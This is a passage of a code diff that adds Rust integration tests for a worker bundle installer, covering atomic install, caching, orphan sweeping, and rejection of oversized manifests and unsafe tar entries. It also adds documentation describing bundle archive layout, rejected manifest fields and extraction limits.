+    // Pre-populate the final dir.
+    let final_dir = bundle_worker_path("collide");
+    std::fs::create_dir_all(&final_dir).unwrap();
+    std::fs::write(final_dir.join("iii.worker.yaml"), "name: collide").unwrap();
+
+    let staging = bundle_staging_root().join("collide-fresh");
+    std::fs::create_dir_all(&staging).unwrap();
+    let err = atomic_install(&staging, "collide").expect_err("collision");
+    assert!(
+        matches!(err, WorkerOpError::AlreadyExists { .. }),
+        "expected AlreadyExists, got {err:?}"
+    );
+}
+
+#[test]
+#[serial]
+fn atomic_install_renames_into_place() {
+    let tmp = tempfile::tempdir().unwrap();
+    let _home = HomeGuard::set(tmp.path());
+
+    let staging = bundle_staging_root().join("rename-source");
+    std::fs::create_dir_all(&staging).unwrap();
+    std::fs::write(staging.join("iii.worker.yaml"), "name: foo").unwrap();
+
+    let final_dir = atomic_install(&staging, "foo").expect("rename ok");
+    assert_eq!(final_dir, bundle_worker_path("foo"));
+    assert!(final_dir.join("iii.worker.yaml").is_file());
+    assert!(!staging.exists(), "staging dir was consumed by rename");
+}
+
+// StagingGuard drop semantics are covered by the in-module unit test
+// in `bundle_download.rs`. Constructing one from this integration test
+// crate would require a test-only public constructor; we deliberately
+// keep that surface absent so production callers don't accidentally
+// reach for it.
+
+// =============================================================================
+// Section F: Cache (HOME-aware)
+// =============================================================================
+
+#[test]
+#[serial]
+fn cache_roundtrip_store_then_lookup_hits() {
+    let tmp = tempfile::tempdir().unwrap();
+    let _home = HomeGuard::set(tmp.path());
+
+    // Build a real archive so its sha256 is content-derived.
+    let bytes = make_targz(&[("iii.worker.yaml", b"name: c", tar::EntryType::Regular)]);
+    let src = write_archive(tmp.path(), "src.tar.gz", &bytes);
+    let digest = sha256_hex(&bytes);
+
+    store_in_cache(&src, &digest).expect("cache insert");
+
+    let hit = lookup_cached_archive(&digest).expect("cache hit");
+    let cache_root = bundle_cache_dir();
+    assert!(
+        hit.starts_with(&cache_root),
+        "cache hit {} not under root {}",
+        hit.display(),
+        cache_root.display()
+    );
+    let cached_bytes = std::fs::read(&hit).unwrap();
+    assert_eq!(cached_bytes, bytes);
+}
+
+#[test]
+#[serial]
+fn cache_corrupt_blob_is_evicted_on_lookup() {
+    let tmp = tempfile::tempdir().unwrap();
+    let _home = HomeGuard::set(tmp.path());
+
+    let real_bytes = make_targz(&[("a", b"b", tar::EntryType::Regular)]);
+    let digest = sha256_hex(&real_bytes);
+    let path = cached_archive_path(&digest).expect("valid digest");
+    std::fs::create_dir_all(bundle_cache_dir()).unwrap();
+    // Plant a blob with the SHA-256-correct filename but corrupt contents.
+    std::fs::write(&path, b"this is not the right content").unwrap();
+
+    // Lookup must report cache miss AND remove the bad blob.
+    assert!(
+        lookup_cached_archive(&digest).is_none(),
+        "corrupt blob was returned as a hit"
+    );
+    assert!(!path.exists(), "corrupt blob was not evicted");
+}
+
+#[test]
+#[serial]
+fn cache_evict_brings_directory_under_limit() {
+    let tmp = tempfile::tempdir().unwrap();
+    let _home = HomeGuard::set(tmp.path());
+
+    let cache = bundle_cache_dir();
+    std::fs::create_dir_all(&cache).unwrap();
+    // Three 4KB files. Limit forces eviction down to two.
+    for (i, hex_byte) in ['a', 'b', 'c'].iter().enumerate() {
+        let digest = format!("{}", hex_byte).repeat(64);
+        // Stagger mtime so the oldest is deterministic.
+        let p = cached_archive_path(&digest).expect("valid digest");
+        std::fs::write(&p, vec![0u8; 4096]).unwrap();
+        // Modify mtime by waiting between writes (best-effort).
+        let _ = i;
+        std::thread::sleep(std::time::Duration::from_millis(10));
+    }
+
+    let _ = evict_cache_to_limit(4096 * 2 + 1);
+    let remaining: Vec<_> = std::fs::read_dir(&cache)
+        .unwrap()
+        .filter_map(|e| e.ok())
+        .collect();
+    assert!(
+        remaining.len() <= 2,
+        "expected eviction to leave <=2 files, got {}",
+        remaining.len()
+    );
+}
+
+#[test]
+fn cache_max_bytes_is_positive() {
+    // Sanity: somebody zeroed the constant accidentally.
+    assert!(BUNDLE_CACHE_MAX_BYTES > 0);
+}
+
+// =============================================================================
+// Section G: Orphan sweep
+// =============================================================================
+
+#[test]
+#[serial]
+fn sweep_orphans_removes_old_staging_dirs() {
+    let tmp = tempfile::tempdir().unwrap();
+    let _home = HomeGuard::set(tmp.path());
+
+    let staging = bundle_staging_root().join("fresh-staging");
+    std::fs::create_dir_all(&staging).unwrap();
+    // Fresh staging dir (mtime is "now") — the sweep's threshold
+    // protects in-flight installs from a sibling process's cleanup.
+    // Backdating mtime to genuinely trip cleanup would need the
+    // `filetime` crate, which the workspace doesn't ship. The
+    // protect-fresh assertion is what we want to lock in here: a
+    // sweep MUST NEVER eat an in-flight install's staging dir.
+    let removed = sweep_orphans();
+    assert_eq!(removed, 0, "sweep should leave fresh dirs in place");
+    assert!(
+        staging.exists(),
+        "sweep should not remove a freshly-created staging dir"
+    );
+}
+
+// =============================================================================
+// Section H: Resolver regression (Iron Rule)
+// =============================================================================
+
+#[test]
+#[serial]
+fn regression_existing_binary_still_resolves_as_binary() {
+    let tmp = tempfile::tempdir().unwrap();
+    let _home = HomeGuard::set(tmp.path());
+
+    let binary = tmp.path().join(".iii").join("workers").join("mybin");
+    std::fs::create_dir_all(binary.parent().unwrap()).unwrap();
+    std::fs::write(&binary, b"#!/bin/sh\necho hi\n").unwrap();
+
+    let resolved = resolve_worker_type("mybin");
+    match resolved {
+        ResolvedWorkerType::Binary { binary_path } => {
+            assert_eq!(binary_path, binary);
+        }
+        other => panic!("expected Binary, got {other:?}"),
+    }
+}
+
+#[test]
+#[serial]
+fn regression_empty_bundle_dir_does_not_shadow_binary_resolve() {
+    let tmp = tempfile::tempdir().unwrap();
+    let _home = HomeGuard::set(tmp.path());
+
+    // Plant an empty bundle dir (no iii.worker.yaml inside) AND a binary.
+    let bundle = bundle_worker_path("shadow");
+    std::fs::create_dir_all(&bundle).unwrap();
+
+    let binary = tmp.path().join(".iii").join("workers").join("shadow");
+    std::fs::create_dir_all(binary.parent().unwrap()).unwrap();
+    std::fs::write(&binary, b"#!/bin/sh\n").unwrap();
+
+    // Resolver should NOT classify the empty bundle dir as Bundle
+    // (requires iii.worker.yaml to be present) — Binary wins.
+    let resolved = resolve_worker_type("shadow");
+    match resolved {
+        ResolvedWorkerType::Binary { .. } => {}
+        other => panic!("expected Binary (empty bundle dir ignored), got {other:?}"),
+    }
+}
+
+#[test]
+#[serial]
+fn bundle_dir_with_manifest_resolves_as_bundle() {
+    let tmp = tempfile::tempdir().unwrap();
+    let _home = HomeGuard::set(tmp.path());
+
+    let bundle = bundle_worker_path("real-bundle");
+    std::fs::create_dir_all(&bundle).unwrap();
+    std::fs::write(bundle.join("iii.worker.yaml"), "name: real-bundle\n").unwrap();
+
+    let resolved = resolve_worker_type("real-bundle");
+    match resolved {
+        ResolvedWorkerType::Bundle { worker_path } => {
+            assert_eq!(worker_path, bundle);
+        }
+        other => panic!("expected Bundle, got {other:?}"),
+    }
+}
+
+#[test]
+#[serial]
+fn workers_dirs_share_home_root() {
+    // Sanity: both binary and bundle roots derive from $HOME so a
+    // HOME guard correctly redirects both.
+    let tmp = tempfile::tempdir().unwrap();
+    let _home = HomeGuard::set(tmp.path());
+
+    let bundle_root = bundle_workers_dir();
+    let binary_marker = tmp.path().join(".iii").join("workers");
+
+    assert!(
+        bundle_root.starts_with(tmp.path()),
+        "bundle dir not under HOME"
+    );
+    assert!(
+        binary_marker.starts_with(tmp.path()),
+        "binary dir not under HOME"
+    );
+}
+
+// =============================================================================
+// Section J: Security regression tests
+//
+// Each test pins one security invariant: SSRF gating, manifest size
+// cap, env-var kill switch, lock-file preservation, sweep_orphans
+// lock-held protection, atomic_install race, boundary acceptance,
+// adversarial tar entry types. If a test breaks, that invariant has
+// regressed.
+// =============================================================================
+
+#[test]
+fn validate_bundle_manifest_rejects_oversize_yaml() {
+    // Billion-laughs defense: any iii.worker.yaml larger than
+    // MAX_BUNDLE_MANIFEST_BYTES (64 KiB) must be refused BEFORE the
+    // bytes reach serde_yaml::from_str — chained anchor/alias expansion
+    // in serde_yaml 0.9.x can balloon a small file to gigabytes.
+    let tmp = tempfile::tempdir().unwrap();
+    let big = "# pad\n".repeat(((MAX_BUNDLE_MANIFEST_BYTES as usize) / 6) + 1);
+    let body = format!("name: regress\nscripts:\n  start: \"node x.js\"\n{}", big);
+    assert!(
+        body.len() as u64 > MAX_BUNDLE_MANIFEST_BYTES,
+        "test setup: oversize manifest must exceed cap"
+    );
+    write_manifest(tmp.path(), &body);
+
+    let err = validate_bundle_manifest(tmp.path(), "regress")
+        .expect_err("oversize manifest must be rejected");
+    match err {
+        WorkerOpError::BundleManifestRejected { field, reason } => {
+            assert_eq!(field, "iii.worker.yaml");
+            assert!(
+                reason.contains("billion-laughs") || reason.contains("capped"),
+                "reason should mention the cap: {reason}"
+            );
+        }
+        other => panic!("expected BundleManifestRejected, got {other:?}"),
+    }
+}
+
+#[test]
+fn parse_bundle_resources_rejects_oversize_manifest() {
+    // Same defense at the resource-parse seam (called by
+    // start_bundle_worker on every boot). Even after install-time
+    // validation, the manifest could be tampered with on disk before
+    // the next start; the size cap fires before serde_yaml runs.
+    let tmp = tempfile::tempdir().unwrap();
+    let big = "# pad\n".repeat(((MAX_BUNDLE_MANIFEST_BYTES as usize) / 6) + 1);
+    let body = format!("name: regress\nresources:\n  cpus: 2\n{}", big);
+    write_manifest(tmp.path(), &body);
+
+    let err = parse_bundle_resources(tmp.path(), ResourceCaps::default())
+        .expect_err("oversize manifest must be rejected by parse_bundle_resources");
+    assert!(
+        matches!(err, WorkerOpError::BundleManifestRejected { .. }),
+        "expected BundleManifestRejected, got {err:?}"
+    );
+}
+
+#[test]
+#[serial]
+fn bundle_workers_disabled_respects_env_var() {
+    // The III_BUNDLE_WORKERS_DISABLED kill switch is the only operator
+    // gate today — handle_bundle_add and start_bundle_worker BOTH read
+    // it before any network or sandbox work.
+    let _unset = EnvGuard::unset(ENV_BUNDLE_WORKERS_DISABLED);
+    assert!(
+        !bundle_workers_disabled(),
+        "default (env unset) must permit bundle workers"
+    );
+
+    let _set = EnvGuard::set(ENV_BUNDLE_WORKERS_DISABLED, "1");
+    assert!(
+        bundle_workers_disabled(),
+        "env=1 must disable bundle workers"
+    );
+}
+
+#[test]
+#[serial]
+fn bundle_workers_disabled_only_for_exact_one() {
+    // Defensive parse: the gate fires only when the env value is the
+    // literal string "1". `true` / `yes` / empty must NOT count, so an
+    // operator who copy-pastes from another tool can't accidentally
+    // half-disable the feature.
+    let _set = EnvGuard::set(ENV_BUNDLE_WORKERS_DISABLED, "true");
+    assert!(!bundle_workers_disabled());
+    let _set = EnvGuard::set(ENV_BUNDLE_WORKERS_DISABLED, "");
+    assert!(!bundle_workers_disabled());
+    let _set = EnvGuard::set(ENV_BUNDLE_WORKERS_DISABLED, "1");
+    assert!(bundle_workers_disabled());
+}
+
+#[test]
+#[serial]
+fn loopback_dev_bypass_requires_env_var() {
+    // Production builds without III_BUNDLE_DEV_LOOPBACK=1 MUST refuse
+    // localhost archive URLs — even though the URL classifier itself
+    // recognizes them. Removes the previous "on by default in every
+    // build" footgun.
+    let _unset = EnvGuard::unset(ENV_BUNDLE_DEV_LOOPBACK);
+    assert!(
+        !loopback_dev_bypass_enabled("https://localhost/x.tar.gz"),
+        "loopback bypass must be off by default"
+    );
+    assert!(!loopback_dev_bypass_enabled(
+        "http://127.0.0.1:8000/x.tar.gz"
+    ));
+    assert!(!loopback_dev_bypass_enabled("http://[::1]/x.tar.gz"));
+
+    let _set = EnvGuard::set(ENV_BUNDLE_DEV_LOOPBACK, "1");
+    assert!(
+        loopback_dev_bypass_enabled("https://localhost/x.tar.gz"),
+        "env=1 enables localhost bypass"
+    );
+    assert!(loopback_dev_bypass_enabled(
+        "http://127.0.0.1:8000/x.tar.gz"
+    ));
+
+    // Public hostnames stay disallowed even with the env gate on.
+    assert!(!loopback_dev_bypass_enabled(
+        "https://cdn.example.com/x.tar.gz"
+    ));
+}
+
+#[test]
+#[serial]
+fn delete_worker_artifacts_preserves_per_worker_lock_file() {
+    // delete_worker_artifacts must NOT unlink the per-worker fslock
+    // file. Process A unlinking the lock while process B holds it
+    // leaves B on a stale inode; process C then creates a new file
+    // at the same path and acquires its own lock against a different
+    // inode — two concurrent installs of the same worker name
+    // proceed in parallel.
+    use iii_worker::cli::managed::delete_worker_artifacts;
+    let tmp = tempfile::tempdir().unwrap();
+    let _home = HomeGuard::set(tmp.path());
+
+    // Pre-create a bundle install + a per-worker lock file.
+    let bundle_dir = bundle_worker_path("lockguard");
+    std::fs::create_dir_all(&bundle_dir).unwrap();
+    std::fs::write(bundle_dir.join("iii.worker.yaml"), "name: lockguard\n").unwrap();
+    let lock_path = lock_path_for("lockguard");
+    std::fs::create_dir_all(bundle_locks_dir()).unwrap();
+    std::fs::write(&lock_path, b"42\n").unwrap();
+    assert!(bundle_dir.is_dir());
+    assert!(lock_path.is_file());
+
+    delete_worker_artifacts("lockguard");
+
+    assert!(!bundle_dir.exists(), "bundle install dir must be removed");
+    assert!(
+        lock_path.is_file(),
+        "per-worker fslock file MUST survive delete_worker_artifacts"
+    );
+}
+
+#[test]
+#[serial]
+fn sweep_orphans_skips_locked_staging_dir() {
+    // The lock-acquirability check inside sweep_orphans is the only
+    // thing preventing the 9-minute-download race from deleting an
+    // in-flight staging dir. A regression that accidentally drops the
+    // try_lock_with_pid call would not be caught by the age-based
+    // test alone.
+    use fslock::LockFile;
+    let tmp = tempfile::tempdir().unwrap();
+    let _home = HomeGuard::set(tmp.path());
+
+    // Staging dir whose basename matches strip_unique_suffix's format.
+    let staging = bundle_staging_root().join("slow-1234567890-0");
+    std::fs::create_dir_all(&staging).unwrap();
+
+    // Backdate mtime past MIN_STAGING_AGE_SECS (60s) so the age guard
+    // alone would consider this dir sweepable; only the lock should
+    // keep it alive.
+    let two_minutes_ago = std::time::SystemTime::now() - std::time::Duration::from_secs(180);
+    let ft = filetime::FileTime::from_system_time(two_minutes_ago);
+    filetime::set_file_mtime(&staging, ft).unwrap();
+
+    // Acquire the per-worker lock as a live install would.
+    std::fs::create_dir_all(bundle_locks_dir()).unwrap();
+    let lock_path = lock_path_for("slow");
+    let mut lock = LockFile::open(&lock_path).unwrap();
+    lock.lock_with_pid().unwrap();
+
+    let removed = sweep_orphans();
+    assert_eq!(removed, 0, "sweep must skip locked staging dir");
+    assert!(
+        staging.exists(),
+        "locked staging dir must survive sweep_orphans"
+    );
+
+    drop(lock);
+}
+
+#[test]
+#[serial]
+fn atomic_install_concurrent_only_one_wins() {
+    // Two threads racing into atomic_install for the same target
+    // name. The fslock in production serializes this, but
+    // atomic_install is a public API and must be safe on its own.
+    // Outcome: exactly one Ok, exactly one Err (AlreadyExists or the
+    // platform ENOTEMPTY/EEXIST mapped to ConfigIo — both are valid
+    // loser outcomes).
+    let tmp = tempfile::tempdir().unwrap();
+    let _home = HomeGuard::set(tmp.path());
+
+    let staging_a = bundle_staging_root().join("race-a");
+    let staging_b = bundle_staging_root().join("race-b");
+    std::fs::create_dir_all(&staging_a).unwrap();
+    std::fs::create_dir_all(&staging_b).unwrap();
+    std::fs::write(staging_a.join("iii.worker.yaml"), "name: race\n").unwrap();
+    std::fs::write(staging_b.join("iii.worker.yaml"), "name: race\n").unwrap();
+
+    let barrier = std::sync::Arc::new(std::sync::Barrier::new(2));
+    let b1 = barrier.clone();
+    let b2 = barrier.clone();
+
+    let t1 = std::thread::spawn(move || {
+        b1.wait();
+        atomic_install(&staging_a, "race")
+    });
+    let t2 = std::thread::spawn(move || {
+        b2.wait();
+        atomic_install(&staging_b, "race")
+    });
+
+    let r1 = t1.join().unwrap();
+    let r2 = t2.join().unwrap();
+
+    let oks = [&r1, &r2].iter().filter(|r| r.is_ok()).count();
+    let errs = [&r1, &r2].iter().filter(|r| r.is_err()).count();
+    assert_eq!(
+        oks, 1,
+        "exactly one race winner expected. r1={r1:?} r2={r2:?}"
+    );
+    assert_eq!(
+        errs, 1,
+        "exactly one race loser expected. r1={r1:?} r2={r2:?}"
+    );
+}
+
+#[test]
+fn extract_accepts_exactly_max_entries() {
+    // Boundary acceptance: a regression that flips `>` to `>=` in the
+    // entry-count guard would silently reject all max-sized legitimate
+    // bundles. Pin the inclusive limit.
+    let mut entries: Vec<(String, Vec<u8>, tar::EntryType)> = Vec::new();
+    for i in 0..MAX_BUNDLE_ENTRIES {
+        entries.push((format!("f{i}.txt"), b"x".to_vec(), tar::EntryType::Regular));
+    }
+    let refs: Vec<(&str, &[u8], tar::EntryType)> = entries
+        .iter()
+        .map(|(p, c, k)| (p.as_str(), c.as_slice(), *k))
+        .collect();
+    let bytes = make_targz(&refs);
+
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "a.tar.gz", &bytes);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+    extract_bundle_safely_blocking(&archive, &dest)
+        .expect("exactly MAX_BUNDLE_ENTRIES must succeed");
+}
+
+#[test]
+fn extract_accepts_exactly_max_depth() {
+    // Same boundary check for depth. The implementation uses `> limit`;
+    // a `>= limit` regression would reject deepest-legal archives.
+    let mut path = String::new();
+    for i in 0..MAX_BUNDLE_DEPTH {
+        if !path.is_empty() {
+            path.push('/');
+        }
+        path.push_str(&format!("d{i}"));
+    }
+    // depth counts Normal components; MAX_BUNDLE_DEPTH directory levels
+    // produce exactly that many Normal components on the path.
+    let bytes = make_targz(&[(path.as_str(), b"x", tar::EntryType::Regular)]);
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "a.tar.gz", &bytes);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+    extract_bundle_safely_blocking(&archive, &dest)
+        .expect("depth == MAX_BUNDLE_DEPTH must succeed");
+}
+
+#[test]
+fn extract_rejects_fifo_entry() {
+    // typeflag '6' = Fifo. Adds coverage for the third non-Regular/
+    // Directory entry type the filter must reject; symlink, hardlink,
+    // and char-device are already tested.
+    let gz = make_raw_tar_gz_with_type(b"fifo", &[], b'6');
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "fifo.tar.gz", &gz);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+    let err =
+        extract_bundle_safely_blocking(&archive, &dest).expect_err("fifo entry must be rejected");
+    assert!(
+        matches!(err, WorkerOpError::BundleArchiveUnsafe { .. }),
+        "expected BundleArchiveUnsafe, got {err:?}"
+    );
+}
+
+#[test]
+fn extract_rejects_block_device_entry() {
+    // typeflag '4' = Block device. Same logic as the Fifo test; covers
+    // the remaining special-file entry type bundle archives never
+    // legitimately ship.
+    let gz = make_raw_tar_gz_with_type(b"bdev", &[], b'4');
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "bdev.tar.gz", &gz);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+    let err = extract_bundle_safely_blocking(&archive, &dest)
+        .expect_err("block-device entry must be rejected");
+    assert!(
+        matches!(err, WorkerOpError::BundleArchiveUnsafe { .. }),
+        "expected BundleArchiveUnsafe, got {err:?}"
+    );
+}
+
+#[test]
+fn extract_rejects_directory_then_file_collision() {
+    // set_overwrite(true) is in effect on the tar archive. An archive
+    // containing a Directory entry then a Regular file at the SAME
+    // path must NOT silently succeed: std::fs::File::create cannot
+    // replace a non-empty directory. Pin this so a future shift in
+    // tar-crate behavior is caught.
+    let bytes = make_targz(&[
+        ("shared", b"" as &[u8], tar::EntryType::Directory),
+        ("shared", b"content", tar::EntryType::Regular),
+    ]);
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "dup.tar.gz", &bytes);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+
+    let result = extract_bundle_safely_blocking(&archive, &dest);
+    assert!(
+        result.is_err(),
+        "dir-then-file collision at same path should fail (got Ok)"
+    );
+}
+
+// =============================================================================
+// Helpers
+// =============================================================================
+
+fn sha256_hex(bytes: &[u8]) -> String {
+    use sha2::{Digest, Sha256};
+    let mut h = Sha256::new();
+    h.update(bytes);
+    format!("{:x}", h.finalize())
+}
+
+/// RAII helper that temporarily redirects `$HOME` to a tempdir. Because
+/// `std::env::set_var` is global, all tests using this helper must be
+/// marked `#[serial]`.
+struct HomeGuard {
+    previous: Option<std::ffi::OsString>,
+}
+
+impl HomeGuard {
+    fn set(path: &Path) -> Self {
+        let previous = std::env::var_os("HOME");
+        // SAFETY: env mutation is process-global. All callers gate with
+        // `#[serial]` to avoid concurrent reads from other tests.
+        unsafe {
+            std::env::set_var("HOME", path);
+        }
+        Self { previous }
+    }
+}
+
+impl Drop for HomeGuard {
+    fn drop(&mut self) {
+        // SAFETY: see Self::set.
+        unsafe {
+            match self.previous.take() {
+                Some(prev) => std::env::set_var("HOME", prev),
+                None => std::env::remove_var("HOME"),
+            }
+        }
+    }
+}
+
+/// RAII helper that temporarily sets/unsets an arbitrary env var.
+/// Mirrors `HomeGuard` for arbitrary keys (used by the
+/// `III_BUNDLE_WORKERS_DISABLED` and `III_BUNDLE_DEV_LOOPBACK` gates).
+/// All callers must be `#[serial]` because env mutation is global.
+struct EnvGuard {
+    key: String,
+    previous: Option<std::ffi::OsString>,
+}
+
+impl EnvGuard {
+    fn set(key: &str, value: &str) -> Self {
+        let previous = std::env::var_os(key);
+        // SAFETY: env mutation is process-global. All callers gate with
+        // `#[serial]` to avoid concurrent reads from other tests.
+        unsafe {
+            std::env::set_var(key, value);
+        }
+        Self {
+            key: key.to_string(),
+            previous,
+        }
+    }
+
+    fn unset(key: &str) -> Self {
+        let previous = std::env::var_os(key);
+        // SAFETY: see Self::set.
+        unsafe {
+            std::env::remove_var(key);
+        }
+        Self {
+            key: key.to_string(),
+            previous,
+        }
+    }
+}
+
+impl Drop for EnvGuard {
+    fn drop(&mut self) {
+        // SAFETY: see Self::set.
+        unsafe {
+            match self.previous.take() {
+                Some(prev) => std::env::set_var(&self.key, prev),
+                None => std::env::remove_var(&self.key),
+            }
+        }
+    }
+}

--- a/crates/iii-worker/tests/local_worker_integration.rs
+++ b/crates/iii-worker/tests/local_worker_integration.rs
@@ -141,7 +141,7 @@ fn build_libkrun_local_script_not_prepared() {
         env: HashMap::new(),
         base_image: None,
     };
-    let script = build_libkrun_local_script(&project, false);
+    let script = build_libkrun_local_script(&project, false, /*is_bundle=*/ false);
     assert!(
         script.contains("apt-get update"),
         "should include setup_cmd"
@@ -166,7 +166,7 @@ fn build_libkrun_local_script_prepared() {
         env: HashMap::new(),
         base_image: None,
     };
-    let script = build_libkrun_local_script(&project, true);
+    let script = build_libkrun_local_script(&project, true, /*is_bundle=*/ false);
     assert!(
         !script.contains("apt-get update"),
         "should omit setup_cmd when prepared"

--- a/docs/creating-workers/workers-registry.mdx
+++ b/docs/creating-workers/workers-registry.mdx
@@ -35,3 +35,111 @@ supported host without separate publications per platform.
 ## Update or remove a published worker
 
 {/* TODO: cover how to publish a new version (semver bump + republish), how to deprecate a worker, and whether/how a published version can be retracted (yanked). */}
+
+## Bundle workers (tar.gz archives)
+
+Bundle workers are a third artifact kind alongside `binary` and `image`. The registry serves a
+single `tar.gz` archive that contains the worker's bundled source plus an `iii.worker.yaml`
+manifest at the archive root. `iii worker add <name>` downloads, verifies a SHA-256 checksum,
+extracts the archive into `~/.iii/workers-bundle/<name>/`, and runs it through the existing
+libkrun rails (the same sandbox path used by local-path workers, minus the host-side source
+watcher).
+
+Use a bundle when:
+
+- You ship a pre-built JavaScript bundle (`esbuild`, `tsdown`, `bun build`) or a packaged Python
+  worker and don't want to publish a Docker image.
+- You want artifacts measured in KB, not MB. Only the bundled source travels in the archive;
+  the runtime ships with the engine-allowlisted base image (`docker.io/iiidev/node:latest` or
+  `docker.io/iiidev/python:latest`).
+- You want install to look identical to other registry workers from the user's perspective
+  (`iii worker add my-worker`, same as binary and OCI).
+
+### Registry response shape
+
+```json
+{
+  "type": "bundle",
+  "name": "my-worker",
+  "version": "1.2.0",
+  "archive_url": "https://cdn.workers.iii.dev/my-worker/1.2.0/bundle.tar.gz",
+  "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
+}
+```
+
+The engine GETs `archive_url`, streams the bytes through a SHA-256 hasher, and compares against
+`sha256`. Mismatches abort the install and delete the downloaded blob immediately.
+
+### Archive layout
+
+The archive root MUST contain `iii.worker.yaml`. Anything else sits at runtime-discoverable
+paths from the bundle's perspective.
+
+```text
+my-worker-1.2.0.tar.gz
+├── iii.worker.yaml
+├── bundle.js
+└── assets/
+    └── ...
+```
+
+### Manifest contract (`iii.worker.yaml`)
+
+Bundle manifests use a strict subset of the local-worker manifest. Three fields are explicitly
+**rejected**:
+
+- `scripts.setup`: would execute publisher-supplied shell during install (a supply-chain
+  smuggling vector).
+- `scripts.install`: same reason. Vendor dependencies into the bundle instead.
+- `runtime.base_image`: would let a bundle pull an arbitrary OCI image as its rootfs. Bundles
+  use the engine-allowlisted base image instead.
+
+Required fields:
+
+- `name`: must equal the install target (the value passed to `iii worker add`).
+- `scripts.start`: a non-empty shell string. The engine `exec`s this inside the sandbox VM.
+  Example: `node bundle.js`, `python -m worker`, `bun run bundle.js`.
+
+Optional fields (clamped against engine caps, with a `W182 BundleResourceClamped` warning when
+the request exceeds the cap):
+
+- `resources.cpus`: defaults to `2`, clamped to `4`.
+- `resources.memory`: defaults to `2048` MiB, clamped to `4096` MiB.
+
+```yaml
+name: my-worker
+version: 1.2.0
+scripts:
+  start: node bundle.js
+resources:
+  cpus: 2
+  memory: 2048
+```
+
+### Archive safety policy
+
+Bundle archives are extracted with tighter limits than OCI layers:
+
+| Limit                       | Value              |
+|-----------------------------|--------------------|
+| Total uncompressed size     | 64 MiB             |
+| Largest single file         | 32 MiB             |
+| Maximum entry count         | 1024               |
+| Maximum directory depth     | 16                 |
+| Allowed tar entry types     | Regular, Directory |
+
+Archives containing symlinks, hard links, character devices, FIFOs, or paths with `..`
+components are rejected with `W181 BundleArchiveUnsafe`.
+
+### Error codes
+
+| Code   | Failure                                                                                            |
+|--------|----------------------------------------------------------------------------------------------------|
+| `W142` | Archive download failed (HTTP error, unexpected content-type, size cap, sha256 mismatch).          |
+| `W180` | Manifest rejected (forbidden field like `scripts.setup` or `runtime.base_image`).                  |
+| `W181` | Archive contains unsafe entries (symlink, hardlink, traversal, oversized, too many entries).       |
+| `W182` | Resource request exceeded engine cap; install proceeded with clamped values (warn, not fail).      |
+| `W183` | Dependency graph too wide or too deep (max depth 5, max transitive count 32).                      |
+
+{/* TODO: document the publish flow (`iii worker publish bundle.tar.gz`?), the registry's
+storage layout, and the recommended bundler configurations for Node/Bun/Python. */}

--- a/docs/creating-workers/workers-registry.mdx.skill.md
+++ b/docs/creating-workers/workers-registry.mdx.skill.md
@@ -33,3 +33,111 @@ supported host without separate publications per platform.
 ## Update or remove a published worker
 
 {/* TODO: cover how to publish a new version (semver bump + republish), how to deprecate a worker, and whether/how a published version can be retracted (yanked). */}
+
+## Bundle workers (tar.gz archives)
+
+Bundle workers are a third artifact kind alongside `binary` and `image`. The registry serves a
+single `tar.gz` archive that contains the worker's bundled source plus an `iii.worker.yaml`
+manifest at the archive root. `iii worker add <name>` downloads, verifies a SHA-256 checksum,
+extracts the archive into `~/.iii/workers-bundle/<name>/`, and runs it through the existing
+libkrun rails (the same sandbox path used by local-path workers, minus the host-side source
+watcher).
+
+Use a bundle when:
+
+- You ship a pre-built JavaScript bundle (`esbuild`, `tsdown`, `bun build`) or a packaged Python
+  worker and don't want to publish a Docker image.
+- You want artifacts measured in KB, not MB. Only the bundled source travels in the archive;
+  the runtime ships with the engine-allowlisted base image (`docker.io/iiidev/node:latest` or
+  `docker.io/iiidev/python:latest`).
+- You want install to look identical to other registry workers from the user's perspective
+  (`iii worker add my-worker`, same as binary and OCI).
+
+### Registry response shape
+
+```json
+{
+  "type": "bundle",
+  "name": "my-worker",
+  "version": "1.2.0",
+  "archive_url": "https://cdn.workers.iii.dev/my-worker/1.2.0/bundle.tar.gz",
+  "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
+}
+```
+
+The engine GETs `archive_url`, streams the bytes through a SHA-256 hasher, and compares against
+`sha256`. Mismatches abort the install and delete the downloaded blob immediately.
+
+### Archive layout
+
+The archive root MUST contain `iii.worker.yaml`. Anything else sits at runtime-discoverable
+paths from the bundle's perspective.
+
+```text
+my-worker-1.2.0.tar.gz
+├── iii.worker.yaml
+├── bundle.js
+└── assets/
+    └── ...
+```
+
+### Manifest contract (`iii.worker.yaml`)
+
+Bundle manifests use a strict subset of the local-worker manifest. Three fields are explicitly
+**rejected**:
+
+- `scripts.setup`: would execute publisher-supplied shell during install (a supply-chain
+  smuggling vector).
+- `scripts.install`: same reason. Vendor dependencies into the bundle instead.
+- `runtime.base_image`: would let a bundle pull an arbitrary OCI image as its rootfs. Bundles
+  use the engine-allowlisted base image instead.
+
+Required fields:
+
+- `name`: must equal the install target (the value passed to `iii worker add`).
+- `scripts.start`: a non-empty shell string. The engine `exec`s this inside the sandbox VM.
+  Example: `node bundle.js`, `python -m worker`, `bun run bundle.js`.
+
+Optional fields (clamped against engine caps, with a `W182 BundleResourceClamped` warning when
+the request exceeds the cap):
+
+- `resources.cpus`: defaults to `2`, clamped to `4`.
+- `resources.memory`: defaults to `2048` MiB, clamped to `4096` MiB.
+
+```yaml
+name: my-worker
+version: 1.2.0
+scripts:
+  start: node bundle.js
+resources:
+  cpus: 2
+  memory: 2048
+```
+
+### Archive safety policy
+
+Bundle archives are extracted with tighter limits than OCI layers:
+
+| Limit                       | Value              |
+|-----------------------------|--------------------|
